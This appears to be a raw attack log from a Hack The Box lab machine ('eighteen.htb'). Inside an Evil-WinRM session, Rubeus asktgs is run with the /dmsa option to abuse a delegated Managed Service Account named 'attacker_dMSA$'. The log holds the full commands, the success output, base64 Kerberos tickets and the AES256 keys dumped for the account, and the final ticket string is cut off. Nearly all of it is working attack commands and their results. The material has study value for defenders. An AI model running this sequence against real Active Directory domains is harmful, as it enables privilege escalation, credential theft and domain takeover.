./Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:ticket.kirbi /ticket:doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA2nm07CJ04LucS6MLP5h/Q8wymLcvBmt1lB9e2DSMVbLIEvAtQxq7rFoHnyMedE2z5RU1bk0SmBHX61G4M6MUZbOZ7vx+ADaUDItSgCmSzIWJlDwTydE33RzCNSYu+fVcDqynjf4VCOthakfB4/agGb87+zFUerYgx6xKsP0JC9R7J8GFhyNbmqayHa8JMnP7y0R8FNuCvnBuQu3B+wvC3R+JQ6epLLIxESTKBeoufnPwDYBO/ubgmKTzwFeez9b0j8Al3a6NfARDgUwlFPbi15huqhjxUgj/gHyZwL6Yg9p7fzY5gVzXLYF4BdROHCqOHNE+g0FlSgtXAz5GYSrOAz8ReVHObDlGQVfqbMR7xSB1vUBgK5fbm0UvT+xOKtVt5ATvlvsWeMsZnKIu10jY9EXEAWRNqERbUrFPTSxqrCl07y6rnzMKRDGWwZes540kVLBtZVEmJfocRxluk8PdLzCaXthZlaeUIV05dEijAJnWMp8lMKsatxBp9PR/mBuPEEKUVyHh/WJyBRAXl0RqnXsCy/AYUCZpR/5unqmdSTNd7Gxu98Eus4Ta9MDZTuRb3BEeUm7+VT96v6+eYC/7JZJHgWXW1kUeRCqNCV9Jk217XVvHQqRLwmqPyI2aUeGTw1BtZvBjj5YDQ5Z2VvYmevn7y4VvcV+so7kyEeR/9yM9AwR4N5lEC9yM5N1SeucydrNJnhGSkSi2rgnt5ba7xcwTb+F7SuJlXfIm0vUBCjVD7DGY15Nm7gkKX3WOqNJpycW/RlI1VCcN1Zw3fmkoOMJequ4tCvHHjitbI6cJJZJJWiUOUysqlMLwWlOppH3PZdHitIBH9TcOjX9K//GVFCgfaE6VokLs8nzfL590d9lzRoqCJAleu4R3RhGLJ4DFa5f2dvQ3i51t7qVplIbSEqwJyRGfUzYJMuHIsbVlZi1l3Or2VZg+QG3ND+AI9tXe0slL52daEnqOyTa3if4BtnW4BrFHfHmd1ooREyUdI1JB26mFnYKalzsucac+QGGhPH/OftZsHmt0b+JrXmxOrkIhqIDZJDZV8CAut0vd6+ii0ga47SlIU9ezG1ytCHROuZ9gSQA14oFymJhhEnnP+oGpxgj88+ru9CltUI6LFZkYEFR/Bln7PEck72vFgsFZG5uG4A3erlmGHTLb9M9mtd737BdUUe+fvOKdaxoME4mtyyO9LphdA8ApV2v8UhlxwrVlRLzAivDvzkngns3d2ZyPM52JqNOw307KT5QHHovGEZ+ZrbW1INy2hFHXN9BVseD7ltZKJWL5ggT2+k7mf7Q0dkSMO2tCjCHapJsGikpbg+C6csqQ0sXHgUCSyhBbS3hzKgg3tcOiCGs5M0YNY3Ae/LNDrIpyMnzSAXD6OB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIAdqevxWSvzGGViuT715YW/dd1gA1wBtgZiy+sEtT+SKoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbBFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQxMTAxMDlaphEYDzIwMjUxMjI0MjEwMTA5WqcRGA8yMDI1MTIzMTExMDEwOVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5odGI=
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfi
le:ticket.kirbi /ticket:doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+
gAwIBEqEDAgECooIEEQSCBA2nm07CJ04LucS6MLP5h/Q8wymLcvBmt1lB9e2DSMVbLIEvAtQxq7rFoHnyMedE2z5RU1bk0SmBHX61G4M6MUZbOZ7vx+ADaUDItSgCmSzIWJlDwTydE33RzCNSYu+fVcDqyn
jf4VCOthakfB4/agGb87+zFUerYgx6xKsP0JC9R7J8GFhyNbmqayHa8JMnP7y0R8FNuCvnBuQu3B+wvC3R+JQ6epLLIxESTKBeoufnPwDYBO/ubgmKTzwFeez9b0j8Al3a6NfARDgUwlFPbi15huqhjxUgj
/gHyZwL6Yg9p7fzY5gVzXLYF4BdROHCqOHNE+g0FlSgtXAz5GYSrOAz8ReVHObDlGQVfqbMR7xSB1vUBgK5fbm0UvT+xOKtVt5ATvlvsWeMsZnKIu10jY9EXEAWRNqERbUrFPTSxqrCl07y6rnzMKRDGWwZ
es540kVLBtZVEmJfocRxluk8PdLzCaXthZlaeUIV05dEijAJnWMp8lMKsatxBp9PR/mBuPEEKUVyHh/WJyBRAXl0RqnXsCy/AYUCZpR/5unqmdSTNd7Gxu98Eus4Ta9MDZTuRb3BEeUm7+VT96v6+eYC/7J
ZJHgWXW1kUeRCqNCV9Jk217XVvHQqRLwmqPyI2aUeGTw1BtZvBjj5YDQ5Z2VvYmevn7y4VvcV+so7kyEeR/9yM9AwR4N5lEC9yM5N1SeucydrNJnhGSkSi2rgnt5ba7xcwTb+F7SuJlXfIm0vUBCjVD7DGY
15Nm7gkKX3WOqNJpycW/RlI1VCcN1Zw3fmkoOMJequ4tCvHHjitbI6cJJZJJWiUOUysqlMLwWlOppH3PZdHitIBH9TcOjX9K//GVFCgfaE6VokLs8nzfL590d9lzRoqCJAleu4R3RhGLJ4DFa5f2dvQ3i51
t7qVplIbSEqwJyRGfUzYJMuHIsbVlZi1l3Or2VZg+QG3ND+AI9tXe0slL52daEnqOyTa3if4BtnW4BrFHfHmd1ooREyUdI1JB26mFnYKalzsucac+QGGhPH/OftZsHmt0b+JrXmxOrkIhqIDZJDZV8CAut0
vd6+ii0ga47SlIU9ezG1ytCHROuZ9gSQA14oFymJhhEnnP+oGpxgj88+ru9CltUI6LFZkYEFR/Bln7PEck72vFgsFZG5uG4A3erlmGHTLb9M9mtd737BdUUe+fvOKdaxoME4mtyyO9LphdA8ApV2v8Uhlxw
rVlRLzAivDvzkngns3d2ZyPM52JqNOw307KT5QHHovGEZ+ZrbW1INy2hFHXN9BVseD7ltZKJWL5ggT2+k7mf7Q0dkSMO2tCjCHapJsGikpbg+C6csqQ0sXHgUCSyhBbS3hzKgg3tcOiCGs5M0YNY3Ae/LND
rIpyMnzSAXD6OB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIAdqevxWSvzGGViuT715YW/dd1gA1wBtgZiy+sEtT+SKoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbB
FB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQxMTAxMDlaphEYDzIwMjUxMjI0MjEwMTA5WqcRGA8yMDI1MTIzMTExMDEwOVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVl
bi5odGI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'attacker_dMSA$' from 'Pwn$'
[+] Sequence number is: 2074353885
[*] Using domain controller: DC01.eighteen.htb (fe80::81d3:a8f7:56a7:facd%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : attacker_dMSA$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 12/24/2025 3:13:59 AM
EndTime : 12/24/2025 3:28:59 AM
RenewTill : 12/31/2025 3:01:09 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : UCgP7Jm9N0f6F6EiHCMMWIBUGhBmUS2iB3ZcWbmtg+A=
Current Keys for attacker_dMSA$: (aes256_cts_hmac_sha1) 2AB7B2782E4140E5E85B9D7D204CFA5DD849FBF7478A3C2B5E2892C939153867
[*] Ticket written to ticket.kirbi
doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA0h9E7JfOellyBoctS9LBh81wlgSCGQs1BFcyrk/n+fDPc0rR8vHB1UUjY/izdMttRVTzoM36pFmFr4FWJq9jFlzM4OakwUEjzO0QM3Jp7Ov9V9iE9BPx8qZ/AUEJ7Tq7wzUcTX5rlR3WPNW3r2TthI930vPMjlHldV/etlTnQ8/DOO5hOEUXGzUQqHoN1ejrEyyfvGmVIGaYQVSa6fJwB2/DeshyGANPEKXJiVLBhZlqiiooNhmldMa4njCTTZHZ/QAb7JI4i4xNxKczuD5kN0TEBpx9gShynrAqqj/rZUwoEPr4FMRmmhD1w3xduoDtxr1E/0SYhe/56K80WQG+6t5ihosYHqI69GxSZml+/MGsn9PJf9Ro5CR9ssTVQI/g673uo18JVjD23L75JZsacRuE2Fr4XbORQS1lLVkiV9mJTLEPh0QXdYgLLRtmJ0K2L1u3VEGg+93lCmE+yxN7EYiIwD4KHFpANnIilYhcPX3N01dQsugj82XTLVmirTF13L+thzgD1se5U2nXScTUdeBERUDmOpXsEDZ5cOIi+46QrRxICOveD9AneDQ+hs4RedDX5iHyIPj7/LWLnPLVvE0tjKbOylklkeglsyR9QnkJ5XkWxyBagG27899tSA10+eQv9RgSgx0fWBaz9yUfxoRd0PdieDsfz/q61Ol7MJacagyHuLrNw+s2irtHIjBh5ymUGzAw2LN1+MHaJNAaSXjvuZ2RLLnUdMgj3ebYo9DjTONoaZXzJy4o1QQdZO5S1Uy6AK4I7Sq0XX8LwHRu77ZFm7OPxZBF/78c9jjhHI1LVU1Mcoxc297R8aLTAOurVCQOPx8UYtFRw3nhOEJm97LtWbvoXXPvaxAfRFcEaMzb+KwoTig7+N2H7McZN1hxq6LrtsjBKt3MJmTkgXGHDpqxI02qgcKBf8ruzEMUSF3miIBwwiaiUUAkPKZJ011MMlp9fKKi3Efd5MWmm3bAZglHrv7HAMEoplq9vbsnOqEb7Hrj4TCpMbQCd9zNgD8LknIcGtRbmlclz+kZqkQ64faMykCAiLQsBSZyg9FlApj455iZdUWzz6Rf+ylITu9iXmVa3vyLY0aBKa+vygAPLshB+JS/n3PbBaJB+jy9ontjKTVq0ib9uTri/TmZ+tr30Mtr+qCYNXfVUASBj+znlM7/TpBzvDmIwG8BjigodNorZNxqTuj8SKmEL+wn0n50z1EsGrLEMCSUVACSrrN8hmrW3E/hK3eUpVK21L5dddxx8Z1/nQKJxqgbaq2vHKApSU2o0mCXlWxlacixRmJl155MtcmdyTgQ/YSIyxCdWZVYtkzjGoURUfMmIgXrhJ7Fi1rvFYyWycdm0f7EiMTSEhKaTtlJhYpIvc/bWP1KOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIITA/gXuwfEzpP+encZHmRooCDCCi3OUvfJHrdQbb4NhoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbBFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQyMzAzNDVaphEYDzIwMjUxMjI1MDkwMzQ1WqcRGA8yMDI1MTIzMTIzMDM0NVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5odGI=
./Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:ticket.kirbi /ticket:doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA0h9E7JfOellyBoctS9LBh81wlgSCGQs1BFcyrk/n+fDPc0rR8vHB1UUjY/izdMttRVTzoM36pFmFr4FWJq9jFlzM4OakwUEjzO0QM3Jp7Ov9V9iE9BPx8qZ/AUEJ7Tq7wzUcTX5rlR3WPNW3r2TthI930vPMjlHldV/etlTnQ8/DOO5hOEUXGzUQqHoN1ejrEyyfvGmVIGaYQVSa6fJwB2/DeshyGANPEKXJiVLBhZlqiiooNhmldMa4njCTTZHZ/QAb7JI4i4xNxKczuD5kN0TEBpx9gShynrAqqj/rZUwoEPr4FMRmmhD1w3xduoDtxr1E/0SYhe/56K80WQG+6t5ihosYHqI69GxSZml+/MGsn9PJf9Ro5CR9ssTVQI/g673uo18JVjD23L75JZsacRuE2Fr4XbORQS1lLVkiV9mJTLEPh0QXdYgLLRtmJ0K2L1u3VEGg+93lCmE+yxN7EYiIwD4KHFpANnIilYhcPX3N01dQsugj82XTLVmirTF13L+thzgD1se5U2nXScTUdeBERUDmOpXsEDZ5cOIi+46QrRxICOveD9AneDQ+hs4RedDX5iHyIPj7/LWLnPLVvE0tjKbOylklkeglsyR9QnkJ5XkWxyBagG27899tSA10+eQv9RgSgx0fWBaz9yUfxoRd0PdieDsfz/q61Ol7MJacagyHuLrNw+s2irtHIjBh5ymUGzAw2LN1+MHaJNAaSXjvuZ2RLLnUdMgj3ebYo9DjTONoaZXzJy4o1QQdZO5S1Uy6AK4I7Sq0XX8LwHRu77ZFm7OPxZBF/78c9jjhHI1LVU1Mcoxc297R8aLTAOurVCQOPx8UYtFRw3nhOEJm97LtWbvoXXPvaxAfRFcEaMzb+KwoTig7+N2H7McZN1hxq6LrtsjBKt3MJmTkgXGHDpqxI02qgcKBf8ruzEMUSF3miIBwwiaiUUAkPKZJ011MMlp9fKKi3Efd5MWmm3bAZglHrv7HAMEoplq9vbsnOqEb7Hrj4TCpMbQCd9zNgD8LknIcGtRbmlclz+kZqkQ64faMykCAiLQsBSZyg9FlApj455iZdUWzz6Rf+ylITu9iXmVa3vyLY0aBKa+vygAPLshB+JS/n3PbBaJB+jy9ontjKTVq0ib9uTri/TmZ+tr30Mtr+qCYNXfVUASBj+znlM7/TpBzvDmIwG8BjigodNorZNxqTuj8SKmEL+wn0n50z1EsGrLEMCSUVACSrrN8hmrW3E/hK3eUpVK21L5dddxx8Z1/nQKJxqgbaq2vHKApSU2o0mCXlWxlacixRmJl155MtcmdyTgQ/YSIyxCdWZVYtkzjGoURUfMmIgXrhJ7Fi1rvFYyWycdm0f7EiMTSEhKaTtlJhYpIvc/bWP1KOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIITA/gXuwfEzpP+encZHmRooCDCCi3OUvfJHrdQbb4NhoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbBFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQyMzAzNDVaphEYDzIwMjUxMjI1MDkwMzQ1WqcRGA8yMDI1MTIzMTIzMDM0NVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5odGI=
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfi
le:ticket.kirbi /ticket:doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+
gAwIBEqEDAgECooIEEQSCBA0h9E7JfOellyBoctS9LBh81wlgSCGQs1BFcyrk/n+fDPc0rR8vHB1UUjY/izdMttRVTzoM36pFmFr4FWJq9jFlzM4OakwUEjzO0QM3Jp7Ov9V9iE9BPx8qZ/AUEJ7Tq7wzUc
TX5rlR3WPNW3r2TthI930vPMjlHldV/etlTnQ8/DOO5hOEUXGzUQqHoN1ejrEyyfvGmVIGaYQVSa6fJwB2/DeshyGANPEKXJiVLBhZlqiiooNhmldMa4njCTTZHZ/QAb7JI4i4xNxKczuD5kN0TEBpx9gSh
ynrAqqj/rZUwoEPr4FMRmmhD1w3xduoDtxr1E/0SYhe/56K80WQG+6t5ihosYHqI69GxSZml+/MGsn9PJf9Ro5CR9ssTVQI/g673uo18JVjD23L75JZsacRuE2Fr4XbORQS1lLVkiV9mJTLEPh0QXdYgLLR
tmJ0K2L1u3VEGg+93lCmE+yxN7EYiIwD4KHFpANnIilYhcPX3N01dQsugj82XTLVmirTF13L+thzgD1se5U2nXScTUdeBERUDmOpXsEDZ5cOIi+46QrRxICOveD9AneDQ+hs4RedDX5iHyIPj7/LWLnPLVv
E0tjKbOylklkeglsyR9QnkJ5XkWxyBagG27899tSA10+eQv9RgSgx0fWBaz9yUfxoRd0PdieDsfz/q61Ol7MJacagyHuLrNw+s2irtHIjBh5ymUGzAw2LN1+MHaJNAaSXjvuZ2RLLnUdMgj3ebYo9DjTONo
aZXzJy4o1QQdZO5S1Uy6AK4I7Sq0XX8LwHRu77ZFm7OPxZBF/78c9jjhHI1LVU1Mcoxc297R8aLTAOurVCQOPx8UYtFRw3nhOEJm97LtWbvoXXPvaxAfRFcEaMzb+KwoTig7+N2H7McZN1hxq6LrtsjBKt3
MJmTkgXGHDpqxI02qgcKBf8ruzEMUSF3miIBwwiaiUUAkPKZJ011MMlp9fKKi3Efd5MWmm3bAZglHrv7HAMEoplq9vbsnOqEb7Hrj4TCpMbQCd9zNgD8LknIcGtRbmlclz+kZqkQ64faMykCAiLQsBSZyg9
FlApj455iZdUWzz6Rf+ylITu9iXmVa3vyLY0aBKa+vygAPLshB+JS/n3PbBaJB+jy9ontjKTVq0ib9uTri/TmZ+tr30Mtr+qCYNXfVUASBj+znlM7/TpBzvDmIwG8BjigodNorZNxqTuj8SKmEL+wn0n50z
1EsGrLEMCSUVACSrrN8hmrW3E/hK3eUpVK21L5dddxx8Z1/nQKJxqgbaq2vHKApSU2o0mCXlWxlacixRmJl155MtcmdyTgQ/YSIyxCdWZVYtkzjGoURUfMmIgXrhJ7Fi1rvFYyWycdm0f7EiMTSEhKaTtlJ
hYpIvc/bWP1KOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIITA/gXuwfEzpP+encZHmRooCDCCi3OUvfJHrdQbb4NhoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbB
FB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQyMzAzNDVaphEYDzIwMjUxMjI1MDkwMzQ1WqcRGA8yMDI1MTIzMTIzMDM0NVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVl
bi5odGI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'attacker_dMSA$' from 'Pwn$'
[+] Sequence number is: 1975987290
[*] Using domain controller: DC01.eighteen.htb (fe80::5f01:4d94:2bc7:6c80%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
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
BYbBmtyYnRndBsMRUlHSFRFRU4uSFRC
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : attacker_dMSA$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 12/24/2025 3:06:12 PM
EndTime : 12/24/2025 3:21:12 PM
RenewTill : 12/31/2025 3:03:45 PM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : R0aTF3YyrWPKh31MBnOg/RJ+E8k0nJD1kcQUfriZb0M=
Current Keys for attacker_dMSA$: (aes256_cts_hmac_sha1) 9D97DDD9696CAF6EA2F3915081B73858C80C3C9DB4FC16FEC6C455C05CED7FCD
[*] Ticket written to ticket.kirbi
doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA0qLpbZgzoNOnqBpLMcoQaZzWKp9g8fo7yiKlnbbSev8IEuRlxJpNh7FdIpw5jd/ZOVWNWpfN9pVDUqtI5D1WA3aZ8roXs4aXFpRpObNACTJYvFmXOaGnJPVAvpq4qDseLprxUxwzWX5DB3cS8BU+1QyrhRSRWMjDHDDKp29loQ4Ttr7HAErw0YrZWNcF+C9+crsHuWwOu5TQCLKOHGPi4eIu6qknTsSbWfT4fVkGHYLwurWb5vdTGydVvQ8tZfXn42G7gR4TwwsKb5Za34KNQnfw6vSw9kk0+XUtpLvRDTClhqUIKOmPXFlTBlUjGnT/W5npCmR3DaRIsoZ3XdQ4TqbX6173RgStklyg8pCSz/zQq7lLcHbgKAceIl2knucJt/7KDSmcO6Vp6PhLH2Et3bRAsE66RoNv7tfO14v3fHW5m/R9aTCx8XD9TeKZTHXUVNJwia9YPPdgX78eBtl7p5dBHWy+MXKH2dnRXHrignUqfL3yOcypt9lor3rLKXjlhDt